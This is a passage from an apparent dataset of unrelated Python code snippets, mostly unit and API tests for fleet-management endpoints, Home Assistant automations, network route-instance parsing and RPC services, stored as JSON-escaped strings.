r = services.get_next_to_arrive(self.a, self.b)\n params = {'req1': self.a, 'req2': self.b}\n\n self.assertTrue(\n mock.call.get(services.SEPTA_NEXTTOARRIVE_URL, params=params) in\n mock_requests.mock_calls)", "async def test_fetch_all_dispatch_routes(client):\n params = [('access_token', 'access_token_example'),\n ('group_id', 56),\n ('end_time', 56),\n ('duration', 56)]\n headers = { \n 'Accept': 'application/json',\n }\n response = await client.request(\n method='GET',\n path='/v1/fleet/dispatch/routes',\n headers=headers,\n params=params,\n )\n assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')", "def test_normal_operation(self, mocker):\n api = mocker.Mock(spec=TelemetryAPI)\n api.record_unique_keys.return_value = HttpResponse(200, '')\n\n unique_keys_tracker = UniqueKeysTracker()\n unique_keys_tracker.track(\"key1\", \"split1\")\n unique_keys_tracker.track(\"key2\", \"split1\")\n\n unique_keys_sync = UniqueKeysSynchronizer(mocker.Mock(), unique_keys_tracker)\n task = UniqueKeysSyncTask(unique_keys_sync.send_all, 1)\n task.start()\n time.sleep(2)\n assert task.is_running()\n assert api.record_unique_keys.mock_calls == mocker.call()\n stop_event = threading.Event()\n task.stop(stop_event)\n stop_event.wait(5)\n assert stop_event.is_set()", "def test_get_route_instance_entry(self, mock_execute_cli_command_on_device):\n mock_device_ins = mock.Mock()\n\n print(\"Get master instance info from HA topo\")\n mock_execute_cli_command_on_device.return_value = self.response[\"HA_SINGLE_INSTANCE\"]\n response = self.ins.get_route_instance_entry(device=mock_device_ins, name=\"master\")\n print(self.tool.pprint(response))\n self.assertIsInstance(response, (list, tuple))\n self.assertEqual(len(response), 2)\n\n print(\"Get all instance info from HA topo\")\n mock_execute_cli_command_on_device.return_value = self.response[\"HA_MULTI_INSTANCE\"]\n response = self.ins.get_route_instance_entry(device=mock_device_ins)\n print(self.tool.pprint(response))\n self.assertIsInstance(response, (list, tuple))\n self.assertEqual(len(response), 8)\n self.assertEqual(int(response[5][\"instance_rib_irib_active_count\"]), 2)\n\n print(\"Get brief all instance info from HA topo\")\n mock_execute_cli_command_on_device.return_value = self.response[\"HA_SINGLE_INSTANCE_BRIEF\"]\n response = self.ins.get_route_instance_entry(device=mock_device_ins)\n print(self.tool.pprint(response))\n self.assertIsInstance(response, (list, tuple))\n self.assertEqual(len(response), 2)\n self.assertEqual(int(response[0][\"instance_rib_irib_active_count\"]), 18)\n\n print(\"Get detail all instance info from HA topo\")\n mock_execute_cli_command_on_device.return_value = self.response[\"HA_SINGLE_INSTANCE_DETAIL\"]\n response = self.ins.get_route_instance_entry(device=mock_device_ins)\n print(self.tool.pprint(response))\n self.assertIsInstance(response, (list, tuple))\n self.assertEqual(len(response), 2)\n self.assertEqual(response[0][\"router_id\"], \"10.208.133.147\")\n\n print(\"Get extensive all instance info from HA topo\")\n mock_execute_cli_command_on_device.return_value = self.response[\"HA_SINGLE_INSTANCE_EXTENSIVE\"]\n response = self.ins.get_route_instance_entry(device=mock_device_ins)\n print(self.tool.pprint(response))\n self.assertIsInstance(response, (list, tuple))\n self.assertEqual(len(response), 18)\n self.assertEqual(response[17][\"instance_rib_irib_name\"], \"inet6color.0\")\n\n print(\"Get summary all instance info from HA topo\")\n 
mock_execute_cli_command_on_device.return_value = self.response[\"HA_SINGLE_INSTANCE_SUMMARY\"]\n response = self.ins.get_route_instance_entry(device=mock_device_ins)\n print(self.tool.pprint(response))\n self.assertIsInstance(response, (list, tuple))\n self.assertGreaterEqual(len(response), 1)\n\n print(\"Get route instance info by text and more options\")\n mock_execute_cli_command_on_device.return_value = self.response[\"SA_INSTANCE_TEXT\"]\n response = self.ins.get_route_instance_entry(device=mock_device_ins, return_mode=\"text\", more_options=\"summary\")\n print(self.tool.pprint(response))\n self.assertIsInstance(response, str)\n self.assertRegex(response, r\"__juniper_private1__.inet.0\")\n\n print(\"Invalid return_mode value\")\n mock_execute_cli_command_on_device.return_value = self.response[\"HA_SINGLE_INSTANCE_SUMMARY\"]\n self.assertRaisesRegex(\n ValueError,\n r\"'return_mode' must be 'ENTRY_LIST' or 'TEXT'\",\n self.ins.get_route_instance_entry,\n device=mock_device_ins, return_mode=\"Unknown\",\n )\n\n print(\"Cannot get response from device\")\n mock_execute_cli_command_on_device.return_value = False\n response = self.ins.get_route_instance_entry(device=mock_device_ins, more_options=\"summary\")\n self.assertFalse(response)", "async def test_list_fleet(client):\n group_param = {}\n params = [('access_token', 'access_token_example'),\n ('starting_after', 'starting_after_example'),\n ('ending_before', 'ending_before_example'),\n ('limit', 56)]\n headers = { \n 'Accept': 'application/json',\n 'Content-Type': 'application/json',\n }\n response = await client.request(\n method='POST',\n path='/v1/fleet/list',\n headers=headers,\n json=group_param,\n params=params,\n )\n assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')", "async def test_get_fleet_trips(client):\n trips_param = {}\n params = [('access_token', 'access_token_example')]\n headers = { \n 'Accept': 'application/json',\n 'Content-Type': 'application/json',\n }\n response = await client.request(\n method='POST',\n path='/v1/fleet/trips',\n headers=headers,\n json=trips_param,\n params=params,\n )\n assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')", "def test_1():\n\tassert api_call().status_code == 200", "async def test_create_vehicle_dispatch_route(client):\n create_dispatch_route_params = null\n params = [('access_token', 'access_token_example')]\n headers = { \n 'Accept': 'application/json',\n 'Content-Type': 'application/json',\n }\n response = await client.request(\n method='POST',\n path='/v1/fleet/vehicles/{vehicle_id}/dispatch/routes'.format(vehicle_id=56),\n headers=headers,\n json=create_dispatch_route_params,\n params=params,\n )\n assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')", "async def test_action(\n hass: HomeAssistant,\n entity_registry: er.EntityRegistry,\n enable_custom_integrations: None,\n) -> None:\n entry = entity_registry.async_get_or_create(DOMAIN, \"test\", \"5678\")\n\n assert await async_setup_component(\n hass,\n automation.DOMAIN,\n {\n automation.DOMAIN: [\n {\n \"trigger\": {\"platform\": \"event\", \"event_type\": \"test_event_open\"},\n \"action\": {\n \"domain\": DOMAIN,\n \"device_id\": \"abcdefgh\",\n \"entity_id\": entry.id,\n \"type\": \"open\",\n },\n },\n {\n \"trigger\": {\"platform\": \"event\", \"event_type\": \"test_event_close\"},\n \"action\": {\n \"domain\": DOMAIN,\n \"device_id\": \"abcdefgh\",\n \"entity_id\": entry.id,\n \"type\": 
\"close\",\n },\n },\n {\n \"trigger\": {\"platform\": \"event\", \"event_type\": \"test_event_stop\"},\n \"action\": {\n \"domain\": DOMAIN,\n \"device_id\": \"abcdefgh\",\n \"entity_id\": entry.id,\n \"type\": \"stop\",\n },\n },\n ]\n },\n )\n await hass.async_block_till_done()\n\n open_calls = async_mock_service(hass, \"cover\", \"open_cover\")\n close_calls = async_mock_service(hass, \"cover\", \"close_cover\")\n stop_calls = async_mock_service(hass, \"cover\", \"stop_cover\")\n\n hass.bus.async_fire(\"test_event_open\")\n await hass.async_block_till_done()\n assert len(open_calls) == 1\n assert len(close_calls) == 0\n assert len(stop_calls) == 0\n\n hass.bus.async_fire(\"test_event_close\")\n await hass.async_block_till_done()\n assert len(open_calls) == 1\n assert len(close_calls) == 1\n assert len(stop_calls) == 0\n\n hass.bus.async_fire(\"test_event_stop\")\n await hass.async_block_till_done()\n assert len(open_calls) == 1\n assert len(close_calls) == 1\n assert len(stop_calls) == 1\n\n assert open_calls[0].domain == DOMAIN\n assert open_calls[0].service == \"open_cover\"\n assert open_calls[0].data == {\"entity_id\": entry.entity_id}\n assert close_calls[0].domain == DOMAIN\n assert close_calls[0].service == \"close_cover\"\n assert close_calls[0].data == {\"entity_id\": entry.entity_id}\n assert stop_calls[0].domain == DOMAIN\n assert stop_calls[0].service == \"stop_cover\"\n assert stop_calls[0].data == {\"entity_id\": entry.entity_id}", "def testApi(self):", "def test_restart_application(self, mocked_check, mocked_stop, mocked_start):\n from supvisors.rpcinterface import RPCInterface\n # create RPC instance\n rpc = RPCInterface(self.supervisor)\n # test RPC call with sub-RPC calls return a direct result\n mocked_stop.return_value = True\n mocked_start.return_value = False\n deferred = rpc.restart_application(0, 'appli', 'wait')\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual([call('appli', True)], mocked_stop.call_args_list)\n self.assertEqual(0, mocked_start.call_count)\n mocked_stop.reset_mock()\n mocked_check.reset_mock()\n # result is a function\n self.assertTrue(callable(deferred))\n self.assertTrue(deferred.waitstop)\n # test this function\n self.assertFalse(deferred())\n self.assertFalse(deferred.waitstop)\n self.assertEqual(0, mocked_stop.call_count)\n self.assertEqual([call(0, 'appli', 'wait')], mocked_start.call_args_list)\n mocked_start.reset_mock()\n # test RPC call with sub_RPC calls returning jobs\n # test with mocking functions telling that the jobs are not completed\n mocked_stop_job = Mock(return_value=False)\n mocked_start_job = Mock(return_value=False)\n mocked_stop.return_value = mocked_stop_job\n mocked_start.return_value = mocked_start_job\n deferred = rpc.restart_application(0, 'appli', 'wait')\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual([call('appli', True)], mocked_stop.call_args_list)\n self.assertEqual(0, mocked_start.call_count)\n mocked_stop.reset_mock()\n # result is a function for deferred result\n self.assertTrue(callable(deferred))\n self.assertTrue(deferred.waitstop)\n # first call to this function tells that job is still in progress\n self.assertEqual(0, mocked_stop_job.call_count)\n self.assertEqual(0, mocked_start_job.call_count)\n self.assertEqual(NOT_DONE_YET, deferred())\n self.assertEqual(0, mocked_stop.call_count)\n self.assertEqual(0, mocked_start.call_count)\n self.assertEqual([call()], mocked_stop_job.call_args_list)\n self.assertEqual(0, mocked_start_job.call_count)\n 
mocked_stop_job.reset_mock()\n # replace the stop job with a function telling that the job is completed\n mocked_stop_job.return_value = True\n self.assertEqual(NOT_DONE_YET, deferred())\n self.assertFalse(deferred.waitstop)\n self.assertEqual(0, mocked_stop.call_count)\n self.assertEqual([call(0, 'appli', 'wait')], mocked_start.call_args_list)\n self.assertEqual([call()], mocked_stop_job.call_args_list)\n self.assertEqual(0, mocked_start_job.call_count)\n mocked_stop_job.reset_mock()\n # call the deferred function again to check that the start is engaged\n self.assertFalse(deferred())\n self.assertEqual([call()], mocked_start_job.call_args_list)\n self.assertEqual(0, mocked_stop_job.call_count)", "def test_is_running(self, mock_call):\n\t\tmock_call.return_value = False \n\t\tdevice = Device(1, \"testDevice\", \"testDesc\", \"pump\", 1)\n\t\tdm = DeviceManager()\n\t\tresponse = dm.isRunning(device) \n\t\tself.assertEqual(response, False)", "def setUp(self):\n super(TestSyncServiceControl, self).setUp()\n self.api = ExternalApiClient()", "def run_single_test(self, config):\n path_name = config['path_name']\n for request in config['request']:\n with self.subTest(request=request, test_name=config['test_name']):\n if 'args' in request:\n url = reverse(path_name, kwargs=request['args'])\n else:\n url = reverse(path_name)\n\n query_params = None\n if 'query_params' in request:\n query_params = urlencode(request['query_params'])\n url = '{}?{}'.format(url, query_params)\n\n data = None\n data_format = 'json'\n if 'data' in request:\n data = request['data']\n\n if 'data_format' in request:\n data_format = request['data_format']\n\n response_check = None\n if 'response_check' in request:\n response_check = request['response_check']\n\n self.call_api(\n url,\n data,\n self.tokens[request['user']],\n request['status'],\n config['type'],\n data_format=data_format,\n response_check=response_check)", "async def test_get_fleet_locations(client):\n group_param = {}\n params = [('access_token', 'access_token_example')]\n headers = { \n 'Accept': 'application/json',\n 'Content-Type': 'application/json',\n }\n response = await client.request(\n method='POST',\n path='/v1/fleet/locations',\n headers=headers,\n json=group_param,\n params=params,\n )\n assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')", "async def test_service_refresh_devices_trigger_no_state_update(\n hass: HomeAssistant, aioclient_mock: AiohttpClientMocker\n) -> None:\n data = {\n \"sensors\": {\n \"1\": {\n \"name\": \"Switch 1\",\n \"type\": \"ZHASwitch\",\n \"state\": {\"buttonevent\": 1000},\n \"config\": {\"battery\": 100},\n \"uniqueid\": \"00:00:00:00:00:00:00:01-00\",\n }\n }\n }\n with patch.dict(DECONZ_WEB_REQUEST, data):\n config_entry = await setup_deconz_integration(hass, aioclient_mock)\n\n assert len(hass.states.async_all()) == 1\n\n captured_events = async_capture_events(hass, CONF_DECONZ_EVENT)\n\n aioclient_mock.clear_requests()\n\n data = {\n \"config\": {},\n \"groups\": {\n \"1\": {\n \"id\": \"Group 1 id\",\n \"name\": \"Group 1 name\",\n \"type\": \"LightGroup\",\n \"state\": {},\n \"action\": {},\n \"scenes\": [{\"id\": \"1\", \"name\": \"Scene 1\"}],\n \"lights\": [\"1\"],\n }\n },\n \"lights\": {\n \"1\": {\n \"name\": \"Light 1 name\",\n \"state\": {\"reachable\": True},\n \"type\": \"Light\",\n \"uniqueid\": \"00:00:00:00:00:00:00:01-00\",\n }\n },\n \"sensors\": {\n \"1\": {\n \"name\": \"Switch 1\",\n \"type\": \"ZHASwitch\",\n \"state\": {\"buttonevent\": 1000},\n 
\"config\": {\"battery\": 100},\n \"uniqueid\": \"00:00:00:00:00:00:00:01-00\",\n }\n },\n }\n\n mock_deconz_request(aioclient_mock, config_entry.data, data)\n\n await hass.services.async_call(\n DECONZ_DOMAIN, SERVICE_DEVICE_REFRESH, service_data={CONF_BRIDGE_ID: BRIDGEID}\n )\n await hass.async_block_till_done()\n\n assert len(hass.states.async_all()) == 5\n assert len(captured_events) == 0", "def test_search_route_instance_entry(self, mock_execute_cli_command_on_device):\n mock_device_ins = mock.Mock()\n\n print(\"search master instance info from HA topo\")\n mock_execute_cli_command_on_device.return_value = self.xml.xml_string_to_dict(self.response[\"HA_SINGLE_INSTANCE\"])\n response = self.ins.search_route_instance_entry(\n mock_device_ins,\n return_mode=\"counter\",\n instance_name=\"master\",\n instance_rib_irib_active_count=22,\n instance_rib_irib_hidden_count=0,\n )\n self.assertEqual(response, 1)\n\n print(\"search master instance from previous result\")\n mock_execute_cli_command_on_device.return_value = self.xml.xml_string_to_dict(self.response[\"HA_SINGLE_INSTANCE\"])\n self.ins.runtime[\"route_instance_entry_list\"] = self.ins.get_route_instance_entry(mock_device_ins)\n response = self.ins.search_route_instance_entry(\n mock_device_ins,\n match_from_previous_response=True,\n return_mode=\"counter\",\n instance_name=\"master\",\n instance_rib_irib_active_count=22,\n instance_rib_irib_hidden_count=0,\n )\n self.assertEqual(response, 1)\n\n print(\"search instance info with brief and not interested counter\")\n mock_execute_cli_command_on_device.return_value = self.xml.xml_string_to_dict(self.response[\"HA_SINGLE_INSTANCE_BRIEF\"])\n response = self.ins.search_route_instance_entry(\n mock_device_ins,\n instance_type=\"forwarding\",\n instance_rib_irib_active_count=1,\n instance_rib_irib_holddown_count=0,\n )\n self.assertEqual(response, 1)\n\n print(\"search instance info with detail\")\n mock_execute_cli_command_on_device.return_value = self.xml.xml_string_to_dict(self.response[\"HA_SINGLE_INSTANCE_DETAIL\"])\n response = self.ins.search_route_instance_entry(\n mock_device_ins,\n instance_type=\"forwarding\",\n instance_state=(\"Active\", \"in\"),\n instance_rib_irib_active_count=18,\n instance_rib_irib_holddown_count=0,\n )\n self.assertTrue(response)\n\n print(\"search instance info but entry don't have related parameter\")\n mock_execute_cli_command_on_device.return_value = self.xml.xml_string_to_dict(self.response[\"HA_SINGLE_INSTANCE_SUMMARY\"])\n response = self.ins.search_route_instance_entry(\n mock_device_ins,\n instance_type=\"forwarding\",\n instance_state=(\"Active\", \"in\"),\n instance_rib_irib_active_count=22,\n instance_rib_irib_holddown_count=0,\n )\n self.assertFalse(response)\n\n print(\"search instance info with extensive\")\n mock_execute_cli_command_on_device.return_value = self.xml.xml_string_to_dict(self.response[\"HA_SINGLE_INSTANCE_EXTENSIVE\"])\n response = self.ins.search_route_instance_entry(\n mock_device_ins,\n return_mode=\"counter\",\n instance_type=\"forwarding\",\n instance_rib_irib_active_count=0,\n instance_rib_irib_holddown_count=0,\n )\n self.assertEqual(response, 16)", "async def run(self):\n current_status = \"Init\"\n while self.expected_status != current_status:\n await asyncio.sleep(1)\n async with aiohttp.ClientSession() as session:\n async with session.get(self.url) as response:\n api_call_result = await response.json()\n current_status = api_call_result[\"status\"]\n \n # Send our single event and then we're done\n yield 
TriggerEvent(api_call_result)", "async def test_get_dispatch_routes_by_vehicle_id(client):\n params = [('access_token', 'access_token_example'),\n ('end_time', 56),\n ('duration', 56)]\n headers = { \n 'Accept': 'application/json',\n }\n response = await client.request(\n method='GET',\n path='/v1/fleet/vehicles/{vehicle_id}/dispatch/routes'.format(vehicle_id=56),\n headers=headers,\n params=params,\n )\n assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')", "def post(self):\n data = api.payload\n\n try:\n phone_call_start = repository.find_start_call_by_call_id(data[\"call_id\"])\n except NoResultFound:\n return 'no call found by specified call id', 404\n\n phone_call_start.end_timestamp = parser.parse(data[\"end_timestamp\"]).replace(tzinfo=None)\n\n # repository.session.add(phone_call_start)\n repository.db.session.commit()\n\n return phone_call_start", "async def test_rpc_ids(bus: lightbus.BusNode, dummy_api, mocker):\n\n async def co_call_rpc():\n await asyncio.sleep(0.1)\n return await bus.my.dummy.my_proc.call_async(field='foo')\n\n async def co_consume_rpcs():\n return await bus.bus_client.consume_rpcs(apis=[dummy_api])\n\n mocker.spy(bus.bus_client, 'send_result')\n\n (call_task, ), (consume_task, ) = await asyncio.wait([co_call_rpc(), co_consume_rpcs()], return_when=asyncio.FIRST_COMPLETED)\n _, kw = bus.bus_client.send_result.call_args\n rpc_message = kw['rpc_message']\n result_message = kw['result_message']\n consume_task.cancel()\n\n assert rpc_message.rpc_id\n assert result_message.rpc_id\n assert rpc_message.rpc_id == result_message.rpc_id", "async def test_rpc_ids(bus: lightbus.BusNode, dummy_api, mocker):\n\n async def co_call_rpc():\n asyncio.sleep(0.1)\n return await bus.my.dummy.my_proc.call_async(field='foo')\n\n async def co_consume_rpcs():\n return await bus.bus_client.consume_rpcs(apis=[dummy_api])\n\n mocker.spy(bus.bus_client, 'send_result')\n\n (call_task, ), (consume_task, ) = await asyncio.wait([co_call_rpc(), co_consume_rpcs()], return_when=asyncio.FIRST_COMPLETED)\n _, kw = bus.bus_client.send_result.call_args\n rpc_message = kw['rpc_message']\n result_message = kw['result_message']\n consume_task.cancel()\n\n assert rpc_message.rpc_id\n assert result_message.rpc_id\n assert rpc_message.rpc_id == result_message.rpc_id", "def test_get_query_with_api_key(self):\r\n users = UserFactory.create_batch(3)\r\n app = AppFactory.create(owner=users[0], info={'total': 150})\r\n task = TaskFactory.create(app=app, info={'url': 'my url'})\r\n taskrun = TaskRunFactory.create(task=task, user=users[0],\r\n info={'answer': 'annakarenina'})\r\n for endpoint in self.endpoints:\r\n url = '/api/' + endpoint + '?api_key=' + users[1].api_key\r\n res = self.app.get(url)\r\n data = json.loads(res.data)\r\n\r\n if endpoint == 'app':\r\n assert len(data) == 1, data\r\n app = data[0]\r\n assert app['info']['total'] == 150, data\r\n assert res.mimetype == 'application/json', res\r\n\r\n if endpoint == 'task':\r\n assert len(data) == 1, data\r\n task = data[0]\r\n assert task['info']['url'] == 'my url', data\r\n assert res.mimetype == 'application/json', res\r\n\r\n if endpoint == 'taskrun':\r\n assert len(data) == 1, data\r\n taskrun = data[0]\r\n assert taskrun['info']['answer'] == 'annakarenina', data\r\n assert res.mimetype == 'application/json', res\r\n\r\n if endpoint == 'user':\r\n assert len(data) == 3, data\r\n user = data[0]\r\n assert user['name'] == 'user1', data\r\n assert res.mimetype == 'application/json', res", "async def 
api(call):\n _LOGGER.debug(\"call %s\", call)\n service_data = call.data\n email = service_data.get(CONF_EMAIL, \"\")\n\n if len(hass.config_entries.async_entries(DOMAIN)) > 1 and not email:\n raise ValueError(\"Email address missing\")\n controller: Controller = None\n for entry in hass.config_entries.async_entries(DOMAIN):\n if (\n len(hass.config_entries.async_entries(DOMAIN)) > 1\n and entry.title != email\n ):\n continue\n controller = hass.data[DOMAIN].get(entry.entry_id)[\"coordinator\"].controller\n if controller is None:\n raise ValueError(f\"No Tesla controllers found for email {email}\")\n command = call.data.get(ATTR_COMMAND)\n parameters: dict = call.data.get(ATTR_PARAMETERS, {})\n _LOGGER.debug(\n \"Service api called with email: %s command: %s parameters: %s\",\n email,\n command,\n parameters,\n )\n path_vars = parameters.pop(ATTR_PATH_VARS)\n return await controller.api(name=command, path_vars=path_vars, **parameters)", "def test_1_variantcall(install_test_files, data_dir):\n with make_workdir() as workdir:\n cl = [\"bcbio_nextgen.py\",\n get_post_process_yaml(data_dir, workdir),\n os.path.join(data_dir, os.pardir, \"100326_FC6107FAAXX\"),\n os.path.join(data_dir, \"run_info-variantcall.yaml\")]\n subprocess.check_call(cl)", "def test_data_framing(self):\n self.start_all_services()\n deproxy_cl = self.get_client(\"deproxy\")\n deproxy_cl.parsing = False\n request_body = \"x\" * 100\n\n deproxy_cl.make_request(request=self.post_request, end_stream=False)\n for byte in request_body[:-1]:\n deproxy_cl.make_request(request=byte, end_stream=False)\n deproxy_cl.make_request(request=request_body[-1], end_stream=True)\n\n self.__assert_test(client=deproxy_cl, request_body=request_body, request_number=1)", "def test_request(comms):\n kernel_comm, frontend_comm = comms\n\n def handler(a, b):\n return a + b\n\n kernel_comm.register_call_handler('test_request', handler)\n\n res = frontend_comm.remote_call(blocking=True).test_request('a', b='b')\n\n assert res == 'ab'", "def invoke():\n # CONFIG: Read configuration information\n config = conf.get_yaml_field(gl.configFile)\n dd_enable = config['ENABLE_DDING']\n dd_token = config['DD_TOKEN']\n dd_url = config['DING_URL']\n email_enable = config['EMAIL_ENABLE']\n # END CONFIG.\n\n # Test report file name.\n time_str = time.strftime('%Y%m%d_%H%M%S', time.localtime())\n path = RunTestCase.create_report_file()\n\n # Start test the send pin message.\n if dd_enable:\n scripts.send_msg_dding(\n '{}:★开始API接口自动化测试★'.format(time_str),\n dd_token,\n dd_url\n )\n\n # Execute the test and send the test report.\n RunTestCase.run(path)\n if dd_enable:\n # Template message.\n dir_list = path.split('\\\\')\n low_path = dir_list[len(dir_list) - 2]\n msg = RunTestCase.tmpl_msg(low_path)\n print(msg)\n scripts.send_msg_dding(msg, dd_token, dd_url)\n\n if email_enable:\n # Send test report to EMAIL.\n email = EmailClass()\n email.send(path)", "def test_run():\n gid = 123\n azure = create_azure_mock('GROUP1', [1, 2, 4, 5, 6, 7])\n data = [create_everbridge_contacts([1, 2, 3, 5, 8], True)]\n delete_ids = [3, 8]\n update_ids = [1, 2]\n insert_ids = [4, 6, 7]\n modify_everbridge_data(data[0], update_ids, 'phone', '8087779999')\n modify_everbridge_data(data[0], delete_ids, 'groups', [gid])\n update_data = create_everbridge_contacts(update_ids, True)\n insert_data = create_everbridge_contacts(insert_ids, False)\n upsert_data = update_data + insert_data\n inserted_data = [create_everbridge_contacts(insert_ids, True)]\n inserted_exids = (\n '&[email protected]' +\n 
'&[email protected]' +\n '&[email protected]')\n ever = create_everbridge_mock(data)\n ever.get_contacts_by_external_ids = MagicMock(side_effect=inserted_data)\n app = Synchronizer(azure, ever)\n # Call run\n rslt = app.run([gid])\n # Tests each method call\n azure.get_group_name.assert_called_with(123)\n ever.get_group_id_by_name.assert_called_with('GROUP1')\n ever.add_group.assert_not_called()\n ever.delete_group.assert_not_called()\n ever.delete_members_from_group.assert_called_with(gid, delete_ids)\n ever.delete_contacts.assert_called_with(delete_ids)\n ever.upsert_contacts.assert_called_with(upsert_data)\n ever.get_contacts_by_external_ids.assert_called_with(inserted_exids)\n ever.add_members_to_group.assert_called_with(gid, insert_ids)\n assert rslt == {\n 'GROUP1': {\n 'azure_group_id': 123, 'everbridge_group_id': 123,\n 'azure_count': 6, 'everbridge_count': 5, 'error_contacts': 0,\n 'inserted_contacts': 3, 'updated_contacts': 2, 'removed_members': 2,\n 'deleted_contacts': 2, 'added_members': 3}\n }", "async def test_get_vehicles_locations(client):\n params = [('access_token', 'access_token_example'),\n ('start_ms', 56),\n ('end_ms', 56)]\n headers = { \n 'Accept': 'application/json',\n }\n response = await client.request(\n method='GET',\n path='/v1/fleet/vehicles/locations',\n headers=headers,\n params=params,\n )\n assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')", "async def test_get_vehicle_locations(client):\n params = [('access_token', 'access_token_example'),\n ('start_ms', 56),\n ('end_ms', 56)]\n headers = { \n 'Accept': 'application/json',\n }\n response = await client.request(\n method='GET',\n path='/v1/fleet/vehicles/{vehicle_id}/locations'.format(vehicle_id=56),\n headers=headers,\n params=params,\n )\n assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')", "def test_api_predictor_events_get(self):\n pass", "async def test_get_dvirs(client):\n params = [('access_token', 'access_token_example'),\n ('end_ms', 56),\n ('duration_ms', 56),\n ('group_id', 56)]\n headers = { \n 'Accept': 'application/json',\n }\n response = await client.request(\n method='GET',\n path='/v1/fleet/maintenance/dvirs',\n headers=headers,\n params=params,\n )\n assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')", "async def test_get_automation_trace(hass, hass_ws_client):\n id = 1\n\n def next_id():\n nonlocal id\n id += 1\n return id\n\n sun_config = {\n \"id\": \"sun\",\n \"trigger\": {\"platform\": \"event\", \"event_type\": \"test_event\"},\n \"action\": {\"service\": \"test.automation\"},\n }\n moon_config = {\n \"id\": \"moon\",\n \"trigger\": [\n {\"platform\": \"event\", \"event_type\": \"test_event2\"},\n {\"platform\": \"event\", \"event_type\": \"test_event3\"},\n ],\n \"condition\": {\n \"condition\": \"template\",\n \"value_template\": \"{{ trigger.event.event_type=='test_event2' }}\",\n },\n \"action\": {\"event\": \"another_event\"},\n }\n\n assert await async_setup_component(\n hass,\n \"automation\",\n {\n \"automation\": [\n sun_config,\n moon_config,\n ]\n },\n )\n\n with patch.object(config, \"SECTIONS\", [\"automation\"]):\n await async_setup_component(hass, \"config\", {})\n\n client = await hass_ws_client()\n\n await client.send_json({\"id\": next_id(), \"type\": \"automation/trace\"})\n response = await client.receive_json()\n assert response[\"success\"]\n assert response[\"result\"] == {}\n\n await client.send_json(\n {\"id\": next_id(), 
\"type\": \"automation/trace\", \"automation_id\": \"sun\"}\n )\n response = await client.receive_json()\n assert response[\"success\"]\n assert response[\"result\"] == {\"sun\": []}\n\n # Trigger \"sun\" automation\n hass.bus.async_fire(\"test_event\")\n await hass.async_block_till_done()\n\n # Get trace\n await client.send_json({\"id\": next_id(), \"type\": \"automation/trace\"})\n response = await client.receive_json()\n assert response[\"success\"]\n assert \"moon\" not in response[\"result\"]\n assert len(response[\"result\"][\"sun\"]) == 1\n trace = response[\"result\"][\"sun\"][0]\n assert len(trace[\"action_trace\"]) == 1\n assert len(trace[\"action_trace\"][\"action/0\"]) == 1\n assert trace[\"action_trace\"][\"action/0\"][0][\"error\"]\n assert \"result\" not in trace[\"action_trace\"][\"action/0\"][0]\n assert trace[\"condition_trace\"] == {}\n assert trace[\"config\"] == sun_config\n assert trace[\"context\"]\n assert trace[\"error\"] == \"Unable to find service test.automation\"\n assert trace[\"state\"] == \"stopped\"\n assert trace[\"trigger\"][\"description\"] == \"event 'test_event'\"\n assert trace[\"unique_id\"] == \"sun\"\n assert trace[\"variables\"]\n\n # Trigger \"moon\" automation, with passing condition\n hass.bus.async_fire(\"test_event2\")\n await hass.async_block_till_done()\n\n # Get trace\n await client.send_json(\n {\"id\": next_id(), \"type\": \"automation/trace\", \"automation_id\": \"moon\"}\n )\n response = await client.receive_json()\n assert response[\"success\"]\n assert \"sun\" not in response[\"result\"]\n assert len(response[\"result\"][\"moon\"]) == 1\n trace = response[\"result\"][\"moon\"][0]\n assert len(trace[\"action_trace\"]) == 1\n assert len(trace[\"action_trace\"][\"action/0\"]) == 1\n assert \"error\" not in trace[\"action_trace\"][\"action/0\"][0]\n assert \"result\" not in trace[\"action_trace\"][\"action/0\"][0]\n assert len(trace[\"condition_trace\"]) == 1\n assert len(trace[\"condition_trace\"][\"condition/0\"]) == 1\n assert trace[\"condition_trace\"][\"condition/0\"][0][\"result\"] == {\"result\": True}\n assert trace[\"config\"] == moon_config\n assert trace[\"context\"]\n assert \"error\" not in trace\n assert trace[\"state\"] == \"stopped\"\n assert trace[\"trigger\"][\"description\"] == \"event 'test_event2'\"\n assert trace[\"unique_id\"] == \"moon\"\n assert trace[\"variables\"]\n\n # Trigger \"moon\" automation, with failing condition\n hass.bus.async_fire(\"test_event3\")\n await hass.async_block_till_done()\n\n # Get trace\n await client.send_json(\n {\"id\": next_id(), \"type\": \"automation/trace\", \"automation_id\": \"moon\"}\n )\n response = await client.receive_json()\n assert response[\"success\"]\n assert \"sun\" not in response[\"result\"]\n assert len(response[\"result\"][\"moon\"]) == 2\n trace = response[\"result\"][\"moon\"][1]\n assert len(trace[\"action_trace\"]) == 0\n assert len(trace[\"condition_trace\"]) == 1\n assert len(trace[\"condition_trace\"][\"condition/0\"]) == 1\n assert trace[\"condition_trace\"][\"condition/0\"][0][\"result\"] == {\"result\": False}\n assert trace[\"config\"] == moon_config\n assert trace[\"context\"]\n assert \"error\" not in trace\n assert trace[\"state\"] == \"stopped\"\n assert trace[\"trigger\"][\"description\"] == \"event 'test_event3'\"\n assert trace[\"unique_id\"] == \"moon\"\n assert trace[\"variables\"]\n\n # Trigger \"moon\" automation, with passing condition\n hass.bus.async_fire(\"test_event2\")\n await hass.async_block_till_done()\n\n # Get trace\n await 
